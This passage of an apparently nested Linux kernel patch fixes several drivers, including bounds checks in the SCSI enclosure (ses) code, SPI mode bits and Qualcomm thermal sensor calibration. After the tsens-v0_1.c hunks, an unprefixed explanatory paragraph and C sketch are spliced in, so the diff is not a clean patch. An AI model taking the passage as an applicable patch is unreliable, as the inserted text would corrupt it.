+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+@@ -379,7 +363,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+-		qla_nvme_ls_unmap(sp, fd);
+ 		qla2x00_rel_sp(sp);
+ 		return rval;
+ 	}
+@@ -445,13 +428,24 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		goto queuing_error;
+ 	}
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
++
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
++	sp->iores.iocb_cnt = req_cnt;
++	if (qla_get_fw_resources(sp->qpair, &sp->iores)) {
++		rval = -EBUSY;
++		goto queuing_error;
++	}
++
+ 	if (req->cnt < (req_cnt + 2)) {
+ 		if (IS_SHADOW_REG_CAPABLE(ha)) {
+ 			cnt = *req->out_ptr;
+ 		} else {
+ 			cnt = rd_reg_dword_relaxed(req->req_q_out);
+-			if (qla2x00_check_reg16_for_disconnect(vha, cnt))
++			if (qla2x00_check_reg16_for_disconnect(vha, cnt)) {
++				rval = -EBUSY;
+ 				goto queuing_error;
++			}
+ 		}
+ 
+ 		if (req->ring_index < cnt)
+@@ -600,6 +594,8 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		qla24xx_process_response_queue(vha, rsp);
+ 
+ queuing_error:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 7fb28c207ee50..2d86f804872bf 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -7094,9 +7094,12 @@ qla2x00_do_dpc(void *data)
+ 			}
+ 		}
+ loop_resync_check:
+-		if (test_and_clear_bit(LOOP_RESYNC_NEEDED,
++		if (!qla2x00_reset_active(base_vha) &&
++		    test_and_clear_bit(LOOP_RESYNC_NEEDED,
+ 		    &base_vha->dpc_flags)) {
+-
++			/*
++			 * Allow abort_isp to complete before moving on to scanning.
++			 */
+ 			ql_dbg(ql_dbg_dpc, base_vha, 0x400f,
+ 			    "Loop resync scheduled.\n");
+ 
+@@ -7447,7 +7450,7 @@ qla2x00_timer(struct timer_list *t)
+ 
+ 		/* if the loop has been down for 4 minutes, reinit adapter */
+ 		if (atomic_dec_and_test(&vha->loop_down_timer) != 0) {
+-			if (!(vha->device_flags & DFLG_NO_CABLE)) {
++			if (!(vha->device_flags & DFLG_NO_CABLE) && !vha->vp_idx) {
+ 				ql_log(ql_log_warn, vha, 0x6009,
+ 				    "Loop down - aborting ISP.\n");
+ 
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 0a1734f34587d..1707d6d144d21 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -433,8 +433,8 @@ int ses_match_host(struct enclosure_device *edev, void *data)
+ }
+ #endif  /*  0  */
+ 
+-static void ses_process_descriptor(struct enclosure_component *ecomp,
+-				   unsigned char *desc)
++static int ses_process_descriptor(struct enclosure_component *ecomp,
++				   unsigned char *desc, int max_desc_len)
+ {
+ 	int eip = desc[0] & 0x10;
+ 	int invalid = desc[0] & 0x80;
+@@ -445,22 +445,32 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	unsigned char *d;
+ 
+ 	if (invalid)
+-		return;
++		return 0;
+ 
+ 	switch (proto) {
+ 	case SCSI_PROTOCOL_FCP:
+ 		if (eip) {
++			if (max_desc_len <= 7)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 		}
+ 		break;
+ 	case SCSI_PROTOCOL_SAS:
++
+ 		if (eip) {
++			if (max_desc_len <= 27)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 			d = desc + 8;
+-		} else
++		} else {
++			if (max_desc_len <= 23)
++				return 1;
+ 			d = desc + 4;
++		}
++
++
+ 		/* only take the phy0 addr */
+ 		addr = (u64)d[12] << 56 |
+ 			(u64)d[13] << 48 |
+@@ -477,6 +487,8 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	}
+ 	ecomp->slot = slot;
+ 	scomp->addr = addr;
++
++	return 0;
+ }
+ 
+ struct efd {
+@@ -549,7 +561,7 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		/* skip past overall descriptor */
+ 		desc_ptr += len + 4;
+ 	}
+-	if (ses_dev->page10)
++	if (ses_dev->page10 && ses_dev->page10_len > 9)
+ 		addl_desc_ptr = ses_dev->page10 + 8;
+ 	type_ptr = ses_dev->page1_types;
+ 	components = 0;
+@@ -557,17 +569,22 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		for (j = 0; j < type_ptr[1]; j++) {
+ 			char *name = NULL;
+ 			struct enclosure_component *ecomp;
++			int max_desc_len;
+ 
+ 			if (desc_ptr) {
+-				if (desc_ptr >= buf + page7_len) {
++				if (desc_ptr + 3 >= buf + page7_len) {
+ 					desc_ptr = NULL;
+ 				} else {
+ 					len = (desc_ptr[2] << 8) + desc_ptr[3];
+ 					desc_ptr += 4;
+-					/* Add trailing zero - pushes into
+-					 * reserved space */
+-					desc_ptr[len] = '\0';
+-					name = desc_ptr;
++					if (desc_ptr + len > buf + page7_len)
++						desc_ptr = NULL;
++					else {
++						/* Add trailing zero - pushes into
++						 * reserved space */
++						desc_ptr[len] = '\0';
++						name = desc_ptr;
++					}
+ 				}
+ 			}
+ 			if (type_ptr[0] == ENCLOSURE_COMPONENT_DEVICE ||
+@@ -583,10 +600,14 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 					ecomp = &edev->component[components++];
+ 
+ 				if (!IS_ERR(ecomp)) {
+-					if (addl_desc_ptr)
+-						ses_process_descriptor(
+-							ecomp,
+-							addl_desc_ptr);
++					if (addl_desc_ptr) {
++						max_desc_len = ses_dev->page10_len -
++						    (addl_desc_ptr - ses_dev->page10);
++						if (ses_process_descriptor(ecomp,
++						    addl_desc_ptr,
++						    max_desc_len))
++							addl_desc_ptr = NULL;
++					}
+ 					if (create)
+ 						enclosure_component_register(
+ 							ecomp);
+@@ -603,9 +624,11 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 			     /* these elements are optional */
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_TARGET_PORT ||
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_INITIATOR_PORT ||
+-			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS))
++			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS)) {
+ 				addl_desc_ptr += addl_desc_ptr[1] + 2;
+-
++				if (addl_desc_ptr + 1 >= ses_dev->page10 + ses_dev->page10_len)
++					addl_desc_ptr = NULL;
++			}
+ 		}
+ 	}
+ 	kfree(buf);
+@@ -704,6 +727,12 @@ static int ses_intf_add(struct device *cdev,
+ 		    type_ptr[0] == ENCLOSURE_COMPONENT_ARRAY_DEVICE)
+ 			components += type_ptr[1];
+ 	}
++
++	if (components == 0) {
++		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
++		goto err_free;
++	}
++
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -827,7 +856,8 @@ static void ses_intf_remove_enclosure(struct scsi_device *sdev)
+ 	kfree(ses_dev->page2);
+ 	kfree(ses_dev);
+ 
+-	kfree(edev->component[0].scratch);
++	if (edev->components)
++		kfree(edev->component[0].scratch);
+ 
+ 	put_device(&edev->edev);
+ 	enclosure_unregister(edev);
+diff --git a/drivers/scsi/snic/snic_debugfs.c b/drivers/scsi/snic/snic_debugfs.c
+index 57bdc3ba49d9c..9dd975b36b5bd 100644
+--- a/drivers/scsi/snic/snic_debugfs.c
++++ b/drivers/scsi/snic/snic_debugfs.c
+@@ -437,6 +437,6 @@ void snic_trc_debugfs_init(void)
+ void
+ snic_trc_debugfs_term(void)
+ {
+-	debugfs_remove(debugfs_lookup(TRC_FILE, snic_glob->trc_root));
+-	debugfs_remove(debugfs_lookup(TRC_ENABLE_FILE, snic_glob->trc_root));
++	debugfs_lookup_and_remove(TRC_FILE, snic_glob->trc_root);
++	debugfs_lookup_and_remove(TRC_ENABLE_FILE, snic_glob->trc_root);
+ }
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index a1de363eba3ff..27699f341f2c5 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -127,7 +127,8 @@ MODULE_PARM_DESC(cdns_mcp_int_mask, "Cadence MCP IntMask");
+ 
+ #define CDNS_MCP_CMD_BASE			0x80
+ #define CDNS_MCP_RESP_BASE			0x80
+-#define CDNS_MCP_CMD_LEN			0x20
++/* FIFO can hold 8 commands */
++#define CDNS_MCP_CMD_LEN			8
+ #define CDNS_MCP_CMD_WORD_LEN			0x4
+ 
+ #define CDNS_MCP_CMD_SSP_TAG			BIT(31)
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index 3b1c0878bb857..930c6075b78cf 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -295,7 +295,6 @@ config SPI_DW_BT1
+ 	tristate "Baikal-T1 SPI driver for DW SPI core"
+ 	depends on MIPS_BAIKAL_T1 || COMPILE_TEST
+ 	select MULTIPLEXER
+-	select MUX_MMIO
+ 	help
+ 	  Baikal-T1 SoC is equipped with three DW APB SSI-based MMIO SPI
+ 	  controllers. Two of them are pretty much normal: with IRQ, DMA,
+diff --git a/drivers/spi/spi-bcm63xx-hsspi.c b/drivers/spi/spi-bcm63xx-hsspi.c
+index b871fd810d801..02f56fc001b47 100644
+--- a/drivers/spi/spi-bcm63xx-hsspi.c
++++ b/drivers/spi/spi-bcm63xx-hsspi.c
+@@ -163,6 +163,7 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 	int step_size = HSSPI_BUFFER_LEN;
+ 	const u8 *tx = t->tx_buf;
+ 	u8 *rx = t->rx_buf;
++	u32 val = 0;
+ 
+ 	bcm63xx_hsspi_set_clk(bs, spi, t->speed_hz);
+ 	bcm63xx_hsspi_set_cs(bs, spi->chip_select, true);
+@@ -178,11 +179,16 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 		step_size -= HSSPI_OPCODE_LEN;
+ 
+ 	if ((opcode == HSSPI_OP_READ && t->rx_nbits == SPI_NBITS_DUAL) ||
+-	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL))
++	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL)) {
+ 		opcode |= HSSPI_OP_MULTIBIT;
+ 
+-	__raw_writel(1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT |
+-		     1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT | 0xff,
++		if (t->rx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT;
++		if (t->tx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT;
++	}
++
++	__raw_writel(val | 0xff,
+ 		     bs->regs + HSSPI_PROFILE_MODE_CTRL_REG(chip_select));
+ 
+ 	while (pending > 0) {
+diff --git a/drivers/spi/spi-intel.c b/drivers/spi/spi-intel.c
+index f619212b0d5c3..627287925fedb 100644
+--- a/drivers/spi/spi-intel.c
++++ b/drivers/spi/spi-intel.c
+@@ -1368,14 +1368,14 @@ static int intel_spi_populate_chip(struct intel_spi *ispi)
+ 	if (!spi_new_device(ispi->master, &chip))
+ 		return -ENODEV;
+ 
+-	/* Add the second chip if present */
+-	if (ispi->master->num_chipselect < 2)
+-		return 0;
+-
+ 	ret = intel_spi_read_desc(ispi);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Add the second chip if present */
++	if (ispi->master->num_chipselect < 2)
++		return 0;
++
+ 	chip.platform_data = NULL;
+ 	chip.chip_select = 1;
+ 
+diff --git a/drivers/spi/spi-sn-f-ospi.c b/drivers/spi/spi-sn-f-ospi.c
+index 348c6e1edd38a..333b22dfd8dba 100644
+--- a/drivers/spi/spi-sn-f-ospi.c
++++ b/drivers/spi/spi-sn-f-ospi.c
+@@ -611,7 +611,7 @@ static int f_ospi_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	ctlr->mode_bits = SPI_TX_DUAL | SPI_TX_QUAD | SPI_TX_OCTAL
+-		| SPI_RX_DUAL | SPI_RX_QUAD | SPI_TX_OCTAL
++		| SPI_RX_DUAL | SPI_RX_QUAD | SPI_RX_OCTAL
+ 		| SPI_MODE_0 | SPI_MODE_1 | SPI_LSB_FIRST;
+ 	ctlr->mem_ops = &f_ospi_mem_ops;
+ 	ctlr->bus_num = -1;
+diff --git a/drivers/spi/spi-synquacer.c b/drivers/spi/spi-synquacer.c
+index 47cbe73137c23..dc188f9202c97 100644
+--- a/drivers/spi/spi-synquacer.c
++++ b/drivers/spi/spi-synquacer.c
+@@ -472,10 +472,9 @@ static int synquacer_spi_transfer_one(struct spi_master *master,
+ 		read_fifo(sspi);
+ 	}
+ 
+-	if (status < 0) {
+-		dev_err(sspi->dev, "failed to transfer. status: 0x%x\n",
+-			status);
+-		return status;
++	if (status == 0) {
++		dev_err(sspi->dev, "failed to transfer. Timeout.\n");
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/staging/media/atomisp/Kconfig b/drivers/staging/media/atomisp/Kconfig
+index 2c8d7fdcc5f7a..c9bff98e5309a 100644
+--- a/drivers/staging/media/atomisp/Kconfig
++++ b/drivers/staging/media/atomisp/Kconfig
+@@ -14,7 +14,7 @@ config VIDEO_ATOMISP
+ 	depends on VIDEO_DEV && INTEL_ATOMISP
+ 	depends on PMIC_OPREGION
+ 	select IOSF_MBI
+-	select VIDEOBUF_VMALLOC
++	select VIDEOBUF2_VMALLOC
+ 	select VIDEO_V4L2_SUBDEV_API
+ 	help
+ 	  Say Y here if your platform supports Intel Atom SoC
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_fops.c b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+index acea7492847d8..9b9d50d7166a0 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_fops.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+@@ -821,13 +821,13 @@ init_subdev:
+ 		goto done;
+ 
+ 	atomisp_subdev_init_struct(asd);
++	/* Ensure that a mode is set */
++	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ done:
+ 	pipe->users++;
+ 	mutex_unlock(&isp->mutex);
+ 
+-	/* Ensure that a mode is set */
+-	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/thermal/hisi_thermal.c b/drivers/thermal/hisi_thermal.c
+index d6974db7aaf76..15af90f5c7d91 100644
+--- a/drivers/thermal/hisi_thermal.c
++++ b/drivers/thermal/hisi_thermal.c
+@@ -427,10 +427,6 @@ static int hi3660_thermal_probe(struct hisi_thermal_data *data)
+ 	data->sensor[0].irq_name = "tsensor_a73";
+ 	data->sensor[0].data = data;
+ 
+-	data->sensor[1].id = HI3660_LITTLE_SENSOR;
+-	data->sensor[1].irq_name = "tsensor_a53";
+-	data->sensor[1].data = data;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/thermal/imx_sc_thermal.c b/drivers/thermal/imx_sc_thermal.c
+index 4df925e3a80bd..dfadb03580ae1 100644
+--- a/drivers/thermal/imx_sc_thermal.c
++++ b/drivers/thermal/imx_sc_thermal.c
+@@ -88,7 +88,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	if (!resource_id)
+ 		return -EINVAL;
+ 
+-	for (i = 0; resource_id[i] > 0; i++) {
++	for (i = 0; resource_id[i] >= 0; i++) {
+ 
+ 		sensor = devm_kzalloc(&pdev->dev, sizeof(*sensor), GFP_KERNEL);
+ 		if (!sensor)
+@@ -127,7 +127,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
++static const int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
+ 
+ static const struct of_device_id imx_sc_thermal_table[] = {
+ 	{ .compatible = "fsl,imx-sc-thermal", .data =  imx_sc_sensors },
+diff --git a/drivers/thermal/intel/intel_pch_thermal.c b/drivers/thermal/intel/intel_pch_thermal.c
+index dabf11a687a15..9e27f430e0345 100644
+--- a/drivers/thermal/intel/intel_pch_thermal.c
++++ b/drivers/thermal/intel/intel_pch_thermal.c
+@@ -29,6 +29,7 @@
+ #define PCH_THERMAL_DID_CNL_LP	0x02F9 /* CNL-LP PCH */
+ #define PCH_THERMAL_DID_CML_H	0X06F9 /* CML-H PCH */
+ #define PCH_THERMAL_DID_LWB	0xA1B1 /* Lewisburg PCH */
++#define PCH_THERMAL_DID_WBG	0x8D24 /* Wellsburg PCH */
+ 
+ /* Wildcat Point-LP  PCH Thermal registers */
+ #define WPT_TEMP	0x0000	/* Temperature */
+@@ -350,6 +351,7 @@ enum board_ids {
+ 	board_cnl,
+ 	board_cml,
+ 	board_lwb,
++	board_wbg,
+ };
+ 
+ static const struct board_info {
+@@ -380,6 +382,10 @@ static const struct board_info {
+ 		.name = "pch_lewisburg",
+ 		.ops = &pch_dev_ops_wpt,
+ 	},
++	[board_wbg] = {
++		.name = "pch_wellsburg",
++		.ops = &pch_dev_ops_wpt,
++	},
+ };
+ 
+ static int intel_pch_thermal_probe(struct pci_dev *pdev,
+@@ -495,6 +501,8 @@ static const struct pci_device_id intel_pch_thermal_id[] = {
+ 		.driver_data = board_cml, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_LWB),
+ 		.driver_data = board_lwb, },
++	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_WBG),
++		.driver_data = board_wbg, },
+ 	{ 0, },
+ };
+ MODULE_DEVICE_TABLE(pci, intel_pch_thermal_id);
+diff --git a/drivers/thermal/intel/intel_powerclamp.c b/drivers/thermal/intel/intel_powerclamp.c
+index b80e25ec12615..2f4cbfdf26a00 100644
+--- a/drivers/thermal/intel/intel_powerclamp.c
++++ b/drivers/thermal/intel/intel_powerclamp.c
+@@ -57,6 +57,7 @@
+ 
+ static unsigned int target_mwait;
+ static struct dentry *debug_dir;
++static bool poll_pkg_cstate_enable;
+ 
+ /* user selected target */
+ static unsigned int set_target_ratio;
+@@ -261,6 +262,9 @@ static unsigned int get_compensation(int ratio)
+ {
+ 	unsigned int comp = 0;
+ 
++	if (!poll_pkg_cstate_enable)
++		return 0;
++
+ 	/* we only use compensation if all adjacent ones are good */
+ 	if (ratio == 1 &&
+ 		cal_data[ratio].confidence >= CONFIDENCE_OK &&
+@@ -519,7 +523,8 @@ static int start_power_clamp(void)
+ 	control_cpu = cpumask_first(cpu_online_mask);
+ 
+ 	clamping = true;
+-	schedule_delayed_work(&poll_pkg_cstate_work, 0);
++	if (poll_pkg_cstate_enable)
++		schedule_delayed_work(&poll_pkg_cstate_work, 0);
+ 
+ 	/* start one kthread worker per online cpu */
+ 	for_each_online_cpu(cpu) {
+@@ -585,11 +590,15 @@ static int powerclamp_get_max_state(struct thermal_cooling_device *cdev,
+ static int powerclamp_get_cur_state(struct thermal_cooling_device *cdev,
+ 				 unsigned long *state)
+ {
+-	if (true == clamping)
+-		*state = pkg_cstate_ratio_cur;
+-	else
++	if (clamping) {
++		if (poll_pkg_cstate_enable)
++			*state = pkg_cstate_ratio_cur;
++		else
++			*state = set_target_ratio;
++	} else {
+ 		/* to save power, do not poll idle ratio while not clamping */
+ 		*state = -1; /* indicates invalid state */
++	}
+ 
+ 	return 0;
+ }
+@@ -712,6 +721,9 @@ static int __init powerclamp_init(void)
+ 		goto exit_unregister;
+ 	}
+ 
++	if (topology_max_packages() == 1 && topology_max_die_per_package() == 1)
++		poll_pkg_cstate_enable = true;
++
+ 	cooling_dev = thermal_cooling_device_register("intel_powerclamp", NULL,
+ 						&powerclamp_cooling_ops);
+ 	if (IS_ERR(cooling_dev)) {
+diff --git a/drivers/thermal/intel/intel_soc_dts_iosf.c b/drivers/thermal/intel/intel_soc_dts_iosf.c
+index 342b0bb5a56d9..8651ff1abe754 100644
+--- a/drivers/thermal/intel/intel_soc_dts_iosf.c
++++ b/drivers/thermal/intel/intel_soc_dts_iosf.c
+@@ -405,7 +405,7 @@ struct intel_soc_dts_sensors *intel_soc_dts_iosf_init(
+ {
+ 	struct intel_soc_dts_sensors *sensors;
+ 	bool notification;
+-	u32 tj_max;
++	int tj_max;
+ 	int ret;
+ 	int i;
+ 
+diff --git a/drivers/thermal/qcom/tsens-v0_1.c b/drivers/thermal/qcom/tsens-v0_1.c
+index 04d012e4f7288..3158f13c54305 100644
+--- a/drivers/thermal/qcom/tsens-v0_1.c
++++ b/drivers/thermal/qcom/tsens-v0_1.c
+@@ -285,7 +285,7 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	u32 p1[10], p2[10];
+ 	int mode = 0;
+ 	u32 *qfprom_cdata;
+-	u32 cdata[6];
++	u32 cdata[4];
+ 
+ 	qfprom_cdata = (u32 *)qfprom_read(priv->dev, "calib");
+ 	if (IS_ERR(qfprom_cdata))
+@@ -296,8 +296,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	cdata[1] = qfprom_cdata[13];
+ 	cdata[2] = qfprom_cdata[0];
+ 	cdata[3] = qfprom_cdata[1];
+-	cdata[4] = qfprom_cdata[22];
+-	cdata[5] = qfprom_cdata[21];
+ 
+ 	mode = (cdata[0] & MSM8939_CAL_SEL_MASK) >> MSM8939_CAL_SEL_SHIFT;
+ 	dev_dbg(priv->dev, "calibration mode is %d\n", mode);
+@@ -314,8 +312,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p2[6] = (cdata[2] & MSM8939_S6_P2_MASK) >> MSM8939_S6_P2_SHIFT;
+ 		p2[7] = (cdata[3] & MSM8939_S7_P2_MASK) >> MSM8939_S7_P2_SHIFT;
+ 		p2[8] = (cdata[3] & MSM8939_S8_P2_MASK) >> MSM8939_S8_P2_SHIFT;
+-		p2[9] = (cdata[4] & MSM8939_S9_P2_MASK_0_4) >> MSM8939_S9_P2_SHIFT_0_4;
+-		p2[9] |= ((cdata[5] & MSM8939_S9_P2_MASK_5) >> MSM8939_S9_P2_SHIFT_5) << 5;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p2[i] = (base1 + p2[i]) << 2;
+ 		fallthrough;
+@@ -331,7 +327,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p1[6] = (cdata[2] & MSM8939_S6_P1_MASK) >> MSM8939_S6_P1_SHIFT;
+ 		p1[7] = (cdata[3] & MSM8939_S7_P1_MASK) >> MSM8939_S7_P1_SHIFT;
+ 		p1[8] = (cdata[3] & MSM8939_S8_P1_MASK) >> MSM8939_S8_P1_SHIFT;
+-		p1[9] = (cdata[4] & MSM8939_S9_P1_MASK) >> MSM8939_S9_P1_SHIFT;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p1[i] = ((base0) + p1[i]) << 2;
+ 		break;
+@@ -534,6 +529,21 @@ static int calibrate_9607(struct tsens_priv *priv)
+ 	return 0;
+ }
+ 
++static int __init init_8939(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 2911;
++	priv->sensor[1].slope = 2789;
++	priv->sensor[2].slope = 2906;
++	priv->sensor[3].slope = 2763;
++	priv->sensor[4].slope = 2922;
++	priv->sensor[5].slope = 2867;
++	priv->sensor[6].slope = 2833;
++	priv->sensor[7].slope = 2838;
++	priv->sensor[8].slope = 2840;
++	/* priv->sensor[9].slope = 2852; */
++
++	return init_common(priv);
++}
++
+ /* v0.1: 8916, 8939, 8974, 9607 */
+ 
+ static struct tsens_features tsens_v0_1_feat = {
+@@ -599,15 +609,15 @@ struct tsens_plat_data data_8916 = {
+ };
+ 
+ static const struct tsens_ops ops_8939 = {
+-	.init		= init_common,
++	.init		= init_8939,
+ 	.calibrate	= calibrate_8939,
+ 	.get_temp	= get_temp_common,
+ };
+ 
+ struct tsens_plat_data data_8939 = {
+-	.num_sensors	= 10,
++	.num_sensors	= 9,
+ 	.ops		= &ops_8939,
+-	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, 10 },
++	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, /* 10 */ },
+ 
+ 	.feat		= &tsens_v0_1_feat,
+ 	.fields	= tsens_v0_1_regfields,
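
The tsens-v0_1.c hunks above move fixed per-sensor slope values into a chip-specific init hook that then delegates to the common initializer. A minimal standalone C sketch of that pattern follows (all *_sketch names are invented for illustration; only the slope values come from the patch):

#include <stdio.h>

struct sensor_sketch { int slope; };

static struct sensor_sketch sensors[9];	/* static storage: zero-initialized */

/* shared initializer: consumes whatever per-chip data was filled in */
static int init_common_sketch(void)
{
	for (int i = 0; i < 9; i++)
		if (sensors[i].slope == 0)
			return -1;	/* chip hook forgot a sensor */
	return 0;
}

/* chip-specific hook: seed the fixed slopes, then delegate */
static int init_8939_sketch(void)
{
	static const int slopes[9] = {
		2911, 2789, 2906, 2763, 2922, 2867, 2833, 2838, 2840,
	};

	for (int i = 0; i < 9; i++)
		sensors[i].slope = slopes[i];
	return init_common_sketch();
}

int main(void)
{
	printf("init: %d\n", init_8939_sketch());
	return 0;
}

Keeping the shared path table-driven is the design point: each SoC variant only supplies data, not duplicated logic.
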
+diff --git a/drivers/thermal/qcom/tsens-v1.c b/drivers/thermal/qcom/tsens-v1.c
+index 1d7f8a80bd13a..9c443a2fb32ca 100644
+--- a/drivers/thermal/qcom/tsens-v1.c
++++ b/drivers/thermal/qcom/tsens-v1.c
+@@ -78,11 +78,6 @@
+ 
+ #define MSM8976_CAL_SEL_MASK	0x3
+ 
+-#define MSM8976_CAL_DEGC_PT1	30
+-#define MSM8976_CAL_DEGC_PT2	120
+-#define MSM8976_SLOPE_FACTOR	1000
+-#define MSM8976_SLOPE_DEFAULT	3200
+-
+ /* eeprom layout data for qcs404/405 (v1) */
+ #define BASE0_MASK	0x000007f8
+ #define BASE1_MASK	0x0007f800
+@@ -142,30 +137,6 @@
+ #define CAL_SEL_MASK	7
+ #define CAL_SEL_SHIFT	0
+ 
+-static void compute_intercept_slope_8976(struct tsens_priv *priv,
+-			      u32 *p1, u32 *p2, u32 mode)
+-{
+-	int i;
+-
+-	priv->sensor[0].slope = 3313;
+-	priv->sensor[1].slope = 3275;
+-	priv->sensor[2].slope = 3320;
+-	priv->sensor[3].slope = 3246;
+-	priv->sensor[4].slope = 3279;
+-	priv->sensor[5].slope = 3257;
+-	priv->sensor[6].slope = 3234;
+-	priv->sensor[7].slope = 3269;
+-	priv->sensor[8].slope = 3255;
+-	priv->sensor[9].slope = 3239;
+-	priv->sensor[10].slope = 3286;
+-
+-	for (i = 0; i < priv->num_sensors; i++) {
+-		priv->sensor[i].offset = (p1[i] * MSM8976_SLOPE_FACTOR) -
+-				(MSM8976_CAL_DEGC_PT1 *
+-				priv->sensor[i].slope);
+-	}
+-}
+-
+ static int calibrate_v1(struct tsens_priv *priv)
+ {
+ 	u32 base0 = 0, base1 = 0;
+@@ -291,7 +262,7 @@ static int calibrate_8976(struct tsens_priv *priv)
+ 		break;
+ 	}
+ 
+-	compute_intercept_slope_8976(priv, p1, p2, mode);
++	compute_intercept_slope(priv, p1, p2, mode);
+ 	kfree(qfprom_cdata);
+ 
+ 	return 0;
+@@ -365,6 +336,22 @@ static const struct reg_field tsens_v1_regfields[MAX_REGFIELDS] = {
+ 	[TRDY] = REG_FIELD(TM_TRDY_OFF, 0, 0),
+ };
+ 
++static int __init init_8956(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 3313;
++	priv->sensor[1].slope = 3275;
++	priv->sensor[2].slope = 3320;
++	priv->sensor[3].slope = 3246;
++	priv->sensor[4].slope = 3279;
++	priv->sensor[5].slope = 3257;
++	priv->sensor[6].slope = 3234;
++	priv->sensor[7].slope = 3269;
++	priv->sensor[8].slope = 3255;
++	priv->sensor[9].slope = 3239;
++	priv->sensor[10].slope = 3286;
++
++	return init_common(priv);
++}
++
+ static const struct tsens_ops ops_generic_v1 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_v1,
+@@ -377,13 +364,25 @@ struct tsens_plat_data data_tsens_v1 = {
+ 	.fields	= tsens_v1_regfields,
+ };
+ 
++static const struct tsens_ops ops_8956 = {
++	.init		= init_8956,
++	.calibrate	= calibrate_8976,
++	.get_temp	= get_temp_tsens_valid,
++};
++
++struct tsens_plat_data data_8956 = {
++	.num_sensors	= 11,
++	.ops		= &ops_8956,
++	.feat		= &tsens_v1_feat,
++	.fields		= tsens_v1_regfields,
++};
++
+ static const struct tsens_ops ops_8976 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_8976,
+ 	.get_temp	= get_temp_tsens_valid,
+ };
+ 
+-/* Valid for both MSM8956 and MSM8976. */
